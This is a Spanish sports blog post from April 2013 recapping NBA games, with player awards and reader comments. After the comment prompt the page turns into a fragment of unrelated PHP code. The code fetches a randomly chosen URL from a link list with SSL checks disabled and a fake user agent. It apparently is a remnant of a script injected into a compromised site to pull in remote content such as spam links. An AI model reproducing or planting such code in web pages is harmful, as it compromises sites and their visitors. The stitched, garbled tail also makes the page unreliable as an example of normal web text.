La Crónica: Super Conley

02 de April de 2013 por Simon

Segunda derrota consecutiva que cosechan los San Antonio Spurs y segunda noche consecutiva que lo hacen en el último segundo. Anoche dieron descanso a Tim Duncan y al final lo acabaron pagando ante unos Grizzlies que forjaron su victoria en el último cuarto tras un partido que había resultado igualadísimo en todas sus fases y facetas (90-92). Mike Conley jugó a un altísimo nivel sobre todo en ese último cuarto en el que se convirtió en un absoluto vendaval  con 11 puntos  de sus 23 puntos totales y anotando la canasta ganadora en el último segundo. Gran nivel el que está mostrando desde la marcha de Rudy Gay. Su equipo necesitaba que diera un paso adelante y vaya si lo ha dado. Bayless es otro que ha mejorado exponencialmente, ayer terminó con 17 puntos y fue clave en la remontada al inicio del último cuarto cuando los Spurs ganaban por 9. Los 25 puntos de Parker fueron insuficientes para un equipo que con estas dos derrotas seguidas se complican mucho en la pelea por ser primeros del Oeste.  Memphis ahora mismo es quinto, aunque tendría ventaja de campo ante los Clippers en estos momentos.

Precisamente Los Angeles Clippers perdieron anoche su tercer partido consecutivo, esta vez ante los Indiana Pacers que están protagonizando un interesantísimo duelo con New York Knicks por la segunda plaza del Este. Indiana salió al partido concentradísimo y con la idea clara de llevarse la victoria del Staples Center y ya en el primer cuarto fueron capaces de abrir las primeras diferencias, que irían aumentando hasta un máximo de 23 puntos en el tercer cuarto. Pero en el último cuarto la reacción de Clippers les dejó a un paso de culminar una gran remontada que no llegó a buen puerto gracias a que Indiana estuvo acertadísimo desde la línea de tiros libres acertando los ocho que tuvieron en el último minuto cuando ya sólo tenían un punto de ventaja (109-106). Hibbert continúa jugando a un gran nivel en este final de regular y estuvo muy bien acompañado por West y George. Por parte de Clippers horrendo partido de todos los titulares que se vieron superados y maniatados por el gran partido que planteo Pacers. Apenas Crawford y Odom dieron el nivel anoche. Se complican mucho los Clippers sus opciones de ventaja de campo en Play Off. Ya están a dos victorias de sus dos rivales y tan sólo mantienen el cuarto puesto por ser campeones de división pero eso no les da ventaja de campo. 

Si los Pacers consiguen ser segundos con mucha probabilidad su rival serán los Boston Celtics que ayer cosecharon una nueva derrota ante Minnesota Timberwolves. Sin ninguna de sus tres estrellas, nunca dio la sensación de que Boston fuera capaz de ganar el encuentro. Perdieron los cuatro parciales  y aunque el marcador no acabara resultado muy desigual, las sensaciones de los espectadores sí que lo fueron (100-110).  Que lleven ojo los Celtics que como sigan perdiendo partidos como este hasta el final de la regular, si Milwaukee coge una buena racha los pueden adelantar. Ayer los Bucks ganaron de manera autoritaria a los Bobcats con un gran partido de prácticamente todos sus jugadores. Hasta 6 jugadores tuvo Milwaukee por encima de los 15 puntos (102-131).

Utah Jazz está dispuesto a poner las cosas difíciles a Lakers y ayer sumó su quinta victoria seguida. Apenas hace una semana parecían en caída libre pero a día de hoy son los máximos candidatos a hacerse con la plaza de play off que queda en el Oeste. Anoche no pasaron apuros ante Portand  en un entretenido encuentro  en el que el más destacado fue Al Jefferson (102-112).  Por su parte, Houston Rockets sigue afianzando su séptima plaza con su victoria ante Orlando Magic a pesar de las bajas de James Harden y Chandler Parsons. Omer Asik y Jeremy Lin fueron suficientes para tumbar a los de Florida (103-111).

Para terminar, Atlanta venció sin problemas a Cleveland (94-104) con un gran partido de Devin Harris, y Detroit ganó a Toronto tras un último cuarto en el que pasaron por encima de los canadienses (108-98).

PREMIOS

MVP: Poker de reyes. Monta Ellis, 19 puntos, 14 asistencias y 6 robos; Omer Asik, 22 puntos y 18 rebotes; Paul George, 23 puntos, 6 rebotes, 10 asistencias y 4 robos; Roy Hibbert, 26 puntos y 10 rebotes. Todos pueden estar contentos del partidazo que jugaron.

Rookie: Mo Harkless se fue a los 28 puntos y 6 rebotes mientras que Jonas Valanciunas consiguió 17 puntos, 6 rebotes y 5 tapones.

Sorpresa: ¿Devin Harris? El jugador de los Hawks, que fuera All-Star hace relativamente poco, fue el mejor de su equipo anoche con 25 puntos y 7 asistencias.

Decepción: Mejor que los titulares de los Clippers no se hubieran levantado de la cama, en especial Chris Paul (10 puntos con un 2 de 12 y 4 pérdidas) y DeAndre Jordan (0 puntos).

Esfuerzo en vano: No se le puede reprochar nada esta vez a Rudy Gay. 34 puntos con un 13 de 18 en tiros de campo, 6 rebotes y 5 asistencias. Kemba Walker también jugó un buen partido (27 puntos con un 8 de 11) pero no pudo evitar un nuevo ridículo de los Bobcats.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Que gran equipo son los Spurs a pesar de la derrota de anoche. Salían a jugar sin 3 de sus mejores jugadores (Duncan, Ginobilli y Leonard) contra un equipo en gran forma como Memphis (con esta 12 victorias caseras seguidas) y a pesar de ello llevaron siempre la iniciativa del encuentro. Gran Parker haciendo de todo, gran defensa y un muy buen movimiento de balón para aprovechar a los lanzadores, vamos baloncesto made in Spurs. Sin embargo no les valío ante la gran competitividad de los Grizzlies. Remaron y remaron hasta conseguir empatar el partido de mano de un Conley esta vez decisivo bien secundado por Marc y Bayless y el trabajo de todos en defensa. Los puestos 3-4-5 del Oeste van a ser una lucha cerrada por ganar la ventaja campo y la eliminatoria que enfrente a 4º y 5º debe ser apasionante en primera ronda. Por su parte a los Spurs ya les aprieta de nuevo OKC por el primer puesto del Oeste aunque no creo que eso les importe mucho. Su verdadero problema es llegar todos sanos a PO. Si lo logran y están al 100% pueden tumbar a cualquiera, si no no creo que pisen las finales de conferencia….

      Citar

  2. Jose Luis dice:
    #2

    Tanto descansito pueden hacerle perder a los Spurs la primera plaza del Oeste, sin la cual no llegarán a las Finales.

      Citar

  3. safd dice:
    #3

    No me extraña lo de Harris, desde finales de febrero mas o menos lleva mejorando mucho sus numeros… sin Lou y con el solar que tenemos en el 2 era algo obligado… también creo que se acordo que este año era FA….

      Citar

  4. GreenPride dice:
    #4

    Gran partido el Clippers-Pacers. Los de Indiana jugaron a un nivel altísimo durante tres cuartos apoyados en un por fin fenomenal Hibbert y en los ramalazos de calidad de West y George. Enfrente los Clippers pagaban el mal día de CP3 y Crawford y jugaban a tirones y sin cabeza pero de repente en el último cuarto pasó lo que muchas veces a los Pacers ante buenos equipos. Los Clips apretaron en defensa con Odom y Bledsoe y los Pacers empezaron a no saber a quién encomendarse en esos minutos de dudas. Así su ventaja de 23 puntos se fue diluyendo y si el partido dura un minuto más creo que hubieran acabado perdiendo. Indiana es un gran equipo pero la falta de un líder y de carisma me hacen dudar de ellos a la hora de los grandes duelos en PO. Por su parte los Clippers son lo contrario un equipo que juega a tirones y depende más de sus estrellas pero con alma, pelea y experiencia y eso les hace ser muy peligrosos cara a PO. Si se repite la eliminatoria con Memphis va a ser la más bonita de primera ronda…

      Citar

  5. rumbero dice:
    #5

    Lo de Utah tiene délito. Cuando ya nadie daba un duro por ellos después de lesiones, Corbinadas y partidos tirados a la basura encadenan 5 victorias seguidas y ahí estan. No son los favoritos para meterse, pero si se lo creen les quedan 4 partidos en casa de los 7 que restan y ya sabemos lo dificil que es ganar en Salt Lake City por mucho que seas Oklahoma o Denver. El desempate contra Lakers y Mavs lo tiene ganado y visto que este año se va a colar el haga menos el tonto tampoco hay que descartarlos…

      Citar

  6. nba dice:
    #6

    Tendria gracia, que a pesar de que la gente tiene casi descartado a Dallas para entrar en el playoffs, pues que fuesen ellos y no Utah ni Lakers, los que entrasen.
    Veremos si esta noche Howard se contagia un poco de la energia de Shaq y decide demostrar de una vez si realmente merece la pena que los Lakers le firmen para el año que viene, sino , auguro que vamos a tener pesadillas debidas a Dirk..

      Citar

  7. Jose Luis dice:
    #7

    Dios mio, otros 47 minutos Bryant, y eso que han ganado por 20 y ganaban por 15 a falta de 2 minutos…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>